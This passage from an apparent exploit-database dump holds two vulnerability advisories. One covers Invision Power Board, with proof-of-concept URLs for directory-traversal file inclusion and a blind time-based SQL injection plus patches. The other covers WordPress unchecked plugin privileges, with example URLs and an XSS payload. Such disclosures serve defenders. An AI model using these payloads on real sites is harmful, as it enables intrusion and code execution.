)\r\n1657 | {\r\n \r\n1658 | self::cleanGlobals( $data[ $k ], ++ $iteration );\r\n \r\n1659 | }\r\n1660 | else\r\n1661 | {\r\n1662 | # Null byte characters\r\n1663 | $v = str_replace( chr('0') , '', $v );\r\n1664 | $v = str_replace( \"\\0\" , '', $v );\r\n1665 | $v = str_replace( \"\\x00\" , '', $v );\r\n1666 | $v = str_replace( '%00' , '', $v );\r\n1667 |\r\n1668 | # File traversal\r\n \r\n1669 | $v = str_replace( \"../\", \"../\", $v );\r\n \r\n1670 |\r\n1671 | $data[ $k ] = $v;\r\n1672 | }\r\n1673 | }\r\n1674 | }\r\n \r\n \r\nAs we can see the function removes null characters and \"../\" sequences from\r\n \r\nincoming data to prevent unwanted file inclusion.\r\n \r\nThe next function that affects the input is:\r\n \r\nline | file: admin/sources/base/core.php\r\n \r\n1573 | static public function parseIncomingRecursively( &$data, $input=array(), $iteration = 0 )\r\n \r\n1574 | {\r\n... |\r\n1583 | foreach( $data as $k => $v )\r\n1584 | {\r\n1585 | if ( is_array( $v ) )\r\n1586 | {\r\n \r\n1587 | $input[ $k ] = self::parseIncomingRecursively( $data[ $k ], array(), ++$iteration );\r\n \r\n1588 | }\r\n1589 | else\r\n1590 | {\r\n1591 | $k = IPSText::parseCleanKey( $k );\r\n \r\n1592 | $v = IPSText::parseCleanValue( $v, false );\r\n \r\n1593 |\r\n1594 | $input[ $k ] = $v;\r\n1595 | }\r\n1596 | }\r\n1597 |\r\n1598 | return $input;\r\n1599 | }\r\n \r\nThe purpose of this function is to clean the key/value pairs of an array\r\n \r\npassed to it with help of the parseCleanKey and parseCleanValue functions. The first one can be skipped as neither of the attacks described later on require\r\n \r\nspecial characters inside variable names. The other looks as follows:\r\n \r\nline | file: admin/sources/base/core.php\r\n4100 | static public function parseCleanValue( $val, $postParse=true )\r\n4101 | {\r\n4102 | if ( $val == \"\" )\r\n4103 | {\r\n4104 | return \"\";\r\n4105 | }\r\n4106 |\r\n \r\n4107 | $val = str_replace( \" \", \" \", IPSText::stripslashes($val) );\r\n \r\n4108 |\r\n4109 | # Convert all carriage return combos\r\n \r\n4110 | $val = str_replace( array( \"\\r\\n\", \"\\n\\r\", \"\\r\" ), \"\\n\", $val );\r\n \r\n4111 |\r\n4112 | $val = str_replace( \"&\", \"&\", $val );\r\n4113 | $val = str_replace( \"<!--\", \"<&#33;--\", $val );\r\n4114 | $val = str_replace( \"-->\", \"-->\", $val );\r\n4115 | $val = str_ireplace( \"<script\", \"<script\", $val );\r\n4116 | $val = str_replace( \">\", \">\", $val );\r\n4117 | $val = str_replace( \"<\", \"<\", $val );\r\n4118 | $val = str_replace( '\"', \"\"\", $val );\r\n \r\n4119 | $val = str_replace( \"\\n\", \"<br />\", $val ); // Convert literal newlines\r\n \r\n4120 | $val = str_replace( \"$\", \"$\", $val );\r\n4121 | $val = str_replace( \"!\", \"!\", $val );\r\n \r\n4122 | $val = str_replace( \"'\", \"'\", $val ); // IMPORTANT: It helps to increase sql query safety.\r\n \r\n4123 |\r\n4124 | if ( IPS_ALLOW_UNICODE )\r\n... |\r\n \r\n \r\nThe function cleans input data from characters used typically in XSS and SQL\r\n \r\nattacks.\r\n \r\n \r\nThe resulting array containing sanitized input data from GET/POST methods is stored in ipsRegistry::$request array (as we can see on the first code\r\n \r\nlisting).\r\n \r\nIV. LOCAL FILE INCLUSION VULNERABILITY\r\n-------------------------\r\n \r\n1. Description.\r\n \r\n \r\nIt is possible to include an arbitrary php file stored on the server in any\r\n \r\nlocation (accessible by the php/web server process) by exploiting the\r\nfollowing code of IPB 3.0.4:\r\n \r\nline | file: admin/sources/base/ipsController.php\r\n142 |public function getCommand( ipsRegistry $registry )\r\n143 |{\r\n144 | $_NOW = IPSDebug::getMemoryDebugFlag();\r\n145 |\r\n146 | $module = ipsRegistry::$current_module;\r\n147 | $section = ipsRegistry::$current_section;\r\n \r\n148 | $filepath = IPSLib::getAppDir( IPS_APP_COMPONENT ) . '/' . self::$modules_dir . '/' . $module . '/';\r\n \r\n149 |\r\n150 | /* Got a section? */\r\n151 | if ( ! $section )\r\n152 | {\r\n \r\n153 | if ( file_exists( $filepath . 'defaultSection.php' ) )\r\n \r\n154 | {\r\n155 | $DEFAULT_SECTION = '';\r\n \r\n156 | require( $filepath . 'defaultSection.php' );\r\n \r\n157 |\r\n158 | if ( $DEFAULT_SECTION )\r\n159 | {\r\n160 | $section = $DEFAULT_SECTION;\r\n161 | }\r\n162 | }\r\n163 | }\r\n164 |\r\n \r\n165 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_' . $section;\r\n \r\n166 |\r\n167 | if ( file_exists( $filepath . 'manualResolver.php' ) )\r\n168 | {\r\n169 | require_once( $filepath . 'manualResolver.php' );\r\n \r\n170 | $classname = self::$class_dir . '_' . IPS_APP_COMPONENT . '_' . $module . '_manualResolver';\r\n \r\n171 | }\r\n172 | else if ( file_exists( $filepath . $section . '.php' ) )\r\n173 | {\r\n174 | require_once( $filepath . $section . '.php' );\r\n175 | }\r\n... |\r\n \r\n \r\nThe require_once function on line 174 uses a variable $section to create a\r\n \r\npath to a php file that is to be included. The variable is assigned the\r\nfollowing value:\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n \r\n1654 | ipsRegistry::$current_section = ( ipsRegistry:: $request['section'] ) ? ipsRegistry::$request['section'] : '';\r\n \r\nwhich as we know from the introduction comes from a user supplied variable\r\n \r\n(via GET or POST method).\r\n \r\n \r\nAlthough the whole $request array has been filtered out to prevent directory\r\n \r\ntraversal and arbitrary file inclusion it is possible to evade these\r\n \r\nmeasures due to a bug in a function implementing the \"friendly URLs\" feature\r\n \r\nintroduced in version 3.0.0 of the IPB forum.\r\n \r\nline | file: admin/sources/base/ipsRegistry.php\r\n1188 | private static function _fUrlInit()\r\n1189 | {\r\n... |\r\n1195 | if ( ipsRegistry::$settings['use_friendly_urls'] )\r\n1196 | {\r\n... |\r\n... |\r\n \r\n1235 | $uri = $_SERVER['REQUEST_URI'] ? $_SERVER['REQUEST_URI'] : @getenv('REQUEST_URI');\r\n \r\n1236 |\r\n1237 | $_toTest = $uri; //( $qs ) ? $qs : $uri;\r\n... |\r\n... |\r\n... |\r\n1306 | //-----------------------------------------\r\n1307 | // If using query string furl, extract any\r\n1308 | // secondary query string.\r\n \r\n1309 | // Ex: http://localhost/index.php?/path/file.html? key=value\r\n \r\n1310 | // Will pull the key=value properly\r\n1311 | //-----------------------------------------\r\n1312 |\r\n1313 | if( substr_count( $_toTest, '?' ) > 1 )\r\n1314 | {\r\n \r\n1315 | $_secondQueryString = substr( $_toTest, strrpos( $_toTest, '?' ) + 1 ); 1316 | $_secondParams = explode( '&', $_secondQueryString );\r\n \r\n1317 |\r\n1318 | if( count($_secondParams) )\r\n1319 | {\r\n1320 | foreach( $_secondParams as $_param )\r\n1321 | {\r\n1322 | list( $k, $v ) = explode( '=', $_param );\r\n1323 |\r\n1324 | $k = IPSText::parseCleanKey( $k );\r\n1325 | $v = IPSText::parseCleanValue( $v );\r\n1326 |\r\n1327 | $_GET[ $k ] = $v;\r\n1328 | $_REQUEST[ $k ] = $v;\r\n1329 | $_urlBits[ $k ] = $v;\r\n1330 |\r\n1331 | ipsRegistry::$request[ $k ] = $v;\r\n1332 | }\r\n1333 | }\r\n1334 | }\r\n1335 | }\r\n... |\r\n \r\nThe above code allows for a secondary query string from which additional\r\n \r\nvariables are retrieved and saved in the $request array as well as $_GET and\r\n \r\n$_REQUEST globals.\r\nIt takes a query string from a previously not cleaned global:\r\n \r\n$_SERVER['REQUEST_URI'] and fails to check if the variables supplied in the\r\n \r\nrequest URI string already exist in any of the arrays as well as to call\r\ncleanGlobals function to sanitize the values.\r\n \r\n \r\nA variable named 'section' can be passed in the secondary query string in order to bypass filtration of \"../\" and %00 sequences, effectively allowing to traverse directories and include any given php file within the system leading\r\n \r\nto a local file inclusion attack.\r\n \r\n \r\nNote: Omitting '.php' extension (to include arbitrary file like /etc/ passwd)\r\n \r\nby using a NULL character will not be possible in this case as a\r\n \r\ncombination of %00 in the REQUEST_URI will not get decoded by the web server\r\n \r\nautomatically and there is no urldecode function to decode it before the\r\nrequire_once call either.\r\n \r\n \r\nVersions older than 3.0.4 have a different implementation of the friendly url\r\n \r\nfeature, but are also vulnerable in the same way.\r\n \r\n2. Proof of concept.\r\n \r\n \r\nThis issue is trivial to exploit with a web browser and a known location of a\r\n \r\nphp file residing on the target system. Authorisation is not required.\r\n \r\nFor example, the following URL in case of IPB 3.0.4:\r\n \r\n \r\nhttp://server-with-ipb-forum-3.0.4.com/forum/index.php?app=core&module=global&section=register&any= ? section = ../../../../../../../../../../../../../../../../../../../../../../../../../../tmp /inc\r\n \r\nor the following in case of versions older than IPB 3.0.4:\r\n \r\n \r\nhttp://server-with-ipb-forum-3.0.[0-3].com/forum/index.php? app=core&module=global&section=register/register/ page__section__ ../../../../../../../../../../../../../../../../../../../../../tmp/inc__\r\n \r\nwill result in including /tmp/inc.php file and executing code it contains.\r\n \r\nV. SQL INJECTION VULNERABILITY\r\n-------------------------\r\n \r\n1. Description.\r\n \r\n \r\nAn SQL Injection attack is possible due to an insufficient sanitization in the\r\n \r\nfollowing function:\r\n \r\nline | file: admin/applications/forums/sources/classes/moderate.php\r\n1820 | /**\r\n1821 | * Create 'where' clause for SQL forum pruning\r\n1822 | *\r\n1823 | * @access public\r\n1824 | * @return boolean\r\n1825 | */\r\n \r\n1826 | public function sqlPruneCreate( $forum_id, $starter_id=\"\", $topic_state=\"\", $post_min=\"\", $date_exp=\"\", $ignore_pin=\"\" )\r\n \r\n1827 | {\r\n1828 | $sql = 'forum_id=' . intval($forum_id);\r\n1829 |\r\n1830 | if ( intval($date_exp) )\r\n1831 | {\r\n1832 | $sql .= \" AND last_post < {$date_exp}\";\r\n1833 | }\r\n1834 |\r\n1835 | if ( intval($starter_id) )\r\n1836 | {\r\n1837 | $sql .= \" AND starter_id={$starter_id}\";\r\n1838 |\r\n1839 | }\r\n1840 |\r\n1841 | if ( intval($post_min) )\r\n1842 | {\r\n1843 | $sql .= \" AND posts < {$post_min}\";\r\n1844 | }\r\n1845 |\r\n1846 | if ($topic_state != 'all')\r\n1847 | {\r\n1848 | if ($topic_state)\r\n1849 | {\r\n1850 | $sql .= \" AND state='{$topic_state}'\";\r\n1851 | }\r\n1852 | }\r\n1853 |\r\n1854 | if ( $ignore_pin != \"\" )\r\n1855 | {\r\n1856 | $sql .= \" AND pinned=0\";\r\n1857 | }\r\n1858 |\r\n1859 |\r\n1860 | return $sql;\r\n1861 | }\r\n \r\n \r\nAll of the IF statements with intval() are to ensure that the arguments passed to the function are numeric before they are placed inside a WHERE clause of a\r\n \r\nquery.\r\n \r\nBecause of the way that intval() works, it is possible to fool the function by passing a string like: '1 OR sleep(5) '. In such case intval() will return a value of 1 thus satisfying the IF conditions and causing the string to be\r\n \r\nplaced inside the query.\r\n \r\nThe sqlPruneCreate function is used 2 times in a code that performs some\r\nmoderator's tasks. One invocation of it can be found in:\r\n \r\n \r\nline | file: admin/applications/forums/modules_public/moderate/ moderate.php\r\n \r\n2323 | protected function _pruneMove()\r\n2324 | {\r\n2325 | //-----------------------------------------\r\n2326 | // Check\r\n2327 | //-----------------------------------------\r\n2328 |\r\n2329 | $this->_resetModerator( $this->topic['forum_id'] );\r\n2330 |\r\n2331 | $this->_genericPermissionCheck( 'mass_move' );\r\n2332 |\r\n2333 | ///-----------------------------------------\r\n2334 | // SET UP\r\n2335 | //-----------------------------------------\r\n2336 |\r\n \r\n2337 | $pergo = intval( $this->request['pergo'] ) ? intval( $this->request['pergo'] ) : 50;\r\n \r\n2338 | $max = intval( $this->request['max'] );\r\n2339 | $current = intval($this->request['current']);\r\n2340 | $maxdone = $pergo + $current;\r\n2341 | $tid_array = array();\r\n2342 | $starter = trim( $this->request['starter'] );\r\n2343 | $state = trim( $this->request['state'] );\r\n2344 | $posts = intval( $this->request['posts'] );\r\n2345 | $dateline = intval( $this->request['dateline'] );\r\n2346 | $source = $this->forum['id'];\r\n2347 | $moveto = intval($this->request['df']);\r\n2348 | $date = 0;\r\n2349 | $ignore_pin = intval( $this->request['ignore_pin'] );\r\n2350 |\r\n2351 | if( $dateline )\r\n2352 | {\r\n2353 | $date = time() - $dateline*60*60*24;\r\n2354 | }\r\n2355 |\r\n2356 | //-----------------------------------------\r\n2357 | // Carry on...\r\n2358 | //-----------------------------------------\r\n2359 |\r\n \r\n2360 | $dbPruneWhere = $this->modLibrary->sqlPruneCreate( $this- >forum['id'], $starter, $state, $posts, $date, $ignore_pin );\r\n \r\n2361 |\r\n2362 | $this->DB->build( array(\r\n2363 | 'select' => 'tid',\r\n2364 | 'from' => 'topics',\r\n2365 | 'where' => $dbPruneWhere,\r\n2366 | 'limit' => array( 0, $pergo ),\r\n2367 | ) );\r\n2368 | $batch = $this->DB->execute();\r\n... |\r\n \r\nAs we can see there are 2 variables that come from a user and are not\r\n \r\nconverted to a number before they are passed to the sqlPruneCreate function:\r\n \r\n$starter and $state.\r\n \r\nThe second variable cannot be used in SQL Injection as it will be treated as a string and embraced with quotes by sqlPruneCreate. A string passed in $starter variable will be placed unquoted in the query as long as the first character is a number allowing a logged in moderator to perform an SQL Injection attack.\r\n \r\nThe vulnerability is somewhat tricky to exploit as there are quite a few\r\n \r\nrestrictions that make creating a successful sql attack vector difficult. Only the WHERE statement can be controlled, quotes are filtered, and UNION or sub selects are prohibited too (at least in case of a MySQL driver). To top it all, the results of the query are not outputted to the browser so it will have\r\n \r\nto be a blind injection.\r\n \r\nNevertheless a crafty attacker might issue a series of requests that might\r\n \r\nallow him to gain some information about the target system or even read\r\n \r\nfiles from the disk depending on permissions granted to the db account that is used by the forum. Other attacks might also be possible when a database engine\r\n \r\nother than MySQL is used.\r\n \r\n2. Proof of concept.\r\n \r\nIf a logged in user with moderator privileges requests an URL like:\r\n \r\nhttp://server-with-ipb-3.x.x-forum.com/forum/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd\r\n \r\nin case of IPB 3.x, or:\r\n \r\nhttp://server-with-ipb-2.x.x-forum.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c\r\n \r\nin case of IPB 2.x.\r\n \r\nA query similar to:\r\n \r\n \r\nSELECT tid FROM ibftopics WHERE forum_id=1 AND starter_id=1 AND starter_id=1 OR substr(version(),1,1)=5 AND sleep(15) -- skip AND state='open' AND pinned=0\r\n \r\nLIMIT 0,50\r\n \r\nwill be run against the database.\r\n \r\nThe query will check if a major version of MySQL server is equal to 5. If that is the case a sleep function will be run which will slow down the page load by\r\n \r\n15 seconds thus revealing the result of the query.\r\n \r\n \r\nFor this to work a valid auth_key needs to be supplied (that can be obtained by going to any of the forums, clicking Forum Management button and selecting Prune/Mass Move feature). Source ($f) and Destination ($df) forums parameters\r\n \r\nin the URL might also need adjusting.\r\n \r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n \r\nThe Local PHP File Inclusion vulnerability can be especially dangerous in a shared hosting environment. Even if server has been configured to prevent\r\n \r\nusers from reading each other's document roots (web server/PHP process\r\n \r\nrunning in a context of the site's owner), an attacker that has an account on the same server as the targeted site could use the vulnerability to place a php file in a shared directory like /tmp and cause the IPB forum on the target\r\n \r\nto execute his code thus gaining access equivalent to the owner of the\r\nwebsite.\r\n \r\n \r\nThe SQL Injection vulnerability is only a threat in case there are moderators\r\n \r\non the forum that cannot be fully trusted or if an attacker manages to\r\nsteal/guess their passwords. Possible risks in case of a successful\r\nexploitation of this flaw have been described in the previous section.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nAll of the IPB versions of the 3.x series (including the newest release of\r\n \r\n3.0.4) are affected by the Local PHP File Inclusion and SQL Injection\r\nvulnerabilities.\r\n \r\n \r\nProbably most if not all of IPB releases of the 2.x series (including 2.3.6)\r\n \r\nare affected by the SQL Injection vulnerability.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nVendor has been informed about the vulnerabilities and should be releasing\r\n \r\npatches soon.\r\n \r\n \r\nI attach 2 patches for the current versions of both 2.x and 3.x series that\r\n \r\ncan be used as a temporary solution.\r\n \r\nIPB 3.0.4 patch:\r\n \r\n \r\ndiff -Nprub ipb304/admin/applications/forums/sources/classes/ moderate.php ipb304-patched/admin/applications/forums/sources/classes/ moderate.php --- ipb304/admin/applications/forums/sources/classes/moderate.php 2009-10-08 16:34:50.000000000 +0100 +++ ipb304-patched/admin/applications/forums/sources/classes/ moderate.php 2009-11-29 01:01:49.000000000 +0000\r\n \r\n@@ -1829,18 +1829,18 @@ class moderatorLibrary\r\n \r\n if ( intval($date_exp) )\r\n {\r\n- $sql .= \" AND last_post < {$date_exp}\";\r\n+ $sql .= \" AND last_post < \". intval($date_exp);\r\n }\r\n \r\n if ( intval($starter_id) )\r\n {\r\n- $sql .= \" AND starter_id={$starter_id}\";\r\n+ $sql .= \" AND starter_id=\". intval($starter_id);\r\n \r\n }\r\n \r\n if ( intval($post_min) )\r\n {\r\n- $sql .= \" AND posts < {$post_min}\";\r\n+ $sql .= \" AND posts < \". intval($post_min);\r\n }\r\n \r\n if ($topic_state != 'all')\r\n \r\ndiff -Nprub ipb304/admin/sources/base/ipsRegistry.php ipb304-patched/ admin/sources/base/ipsRegistry.php --- ipb304/admin/sources/base/ipsRegistry.php 2009-10-08 16:34:24.000000000 +0100 +++ ipb304-patched/admin/sources/base/ipsRegistry.php 2009-11-29 00:57:13.000000000 +0000\r\n \r\n@@ -479,6 +479,9 @@ class ipsRegistry\r\n \r\n \r\n/* First pass of app set up. Needs to be BEFORE caches and member are set up */\r\n \r\n self::_fUrlInit();\r\n+ IPSLib::cleanGlobals( $_GET );\r\n+ IPSLib::cleanGlobals( $_REQUEST );\r\n+ IPSLib::cleanGlobals( self::$request );\r\n \r\n self::_manageIncomingURLs();\r\n \r\n \r\nIPB 2.3.6 patch:\r\n \r\n \r\ndiff -Nprub ipb236/sources/lib/func_mod.php ipb236-patched/sources/lib/ func_mod.php\r\n \r\n--- ipb236/sources/lib/func_mod.php 2009-11-29 01:10:13.000000000 +0000\r\n \r\n+++ ipb236-patched/sources/lib/func_mod.php 2009-11-29 01:19:23.000000000 +0000\r\n \r\n@@ -1219,18 +1219,18 @@ class func_mod\r\n \r\n if ( intval($date_exp) )\r\n {\r\n- $sql .= \" AND last_post < $date_exp\";\r\n+ $sql .= \" AND last_post < \". intval($date_exp);\r\n }\r\n \r\n if ( intval($starter_id) )\r\n {\r\n- $sql .= \" AND starter_id=$starter_id\";\r\n+ $sql .= \" AND starter_id=\". intval($starter_id);\r\n \r\n }\r\n \r\n if ( intval($post_min) )\r\n {\r\n- $sql .= \" AND posts < $post_min\";\r\n+ $sql .= \" AND posts < \". intval($post_min);\r\n }\r\n \r\n if ($topic_state != 'all')\r\n \r\n \r\nApply by going to your forum's directory and running the command:\r\npatch -p1 < path_to_the_patch\r\n \r\nIX. REFERENCES\r\n-------------------------\r\nhttp://www.invisionpower.com/products/board/\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/10083", "cvss": {"score": 0, "vector": "NONE"}, "hash": "981b7cc958b6792cabd3f10637950334b7d0b7abb67d2eeba306c5832613e101"}, {"lastseen": "2016-04-20T02:17:08", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 1, "reporter": "Core Security", "published": "2009-07-10T00:00:00", "type": "zdt", "title": "WordPress Privileges Unchecked in admin.php and Multiple Information", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-07-10T00:00:00", "href": "http://0day.today/exploit/description/5473", "id": "1337DAY-ID-5473", "sourceData": "====================================================================\r\nWordPress Privileges Unchecked in admin.php and Multiple Information\r\n====================================================================\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nWordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\r\nDate published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and Jose Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must by copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavasScript code that injects PHP code. It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref=\"\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\r\nNotice: Use of 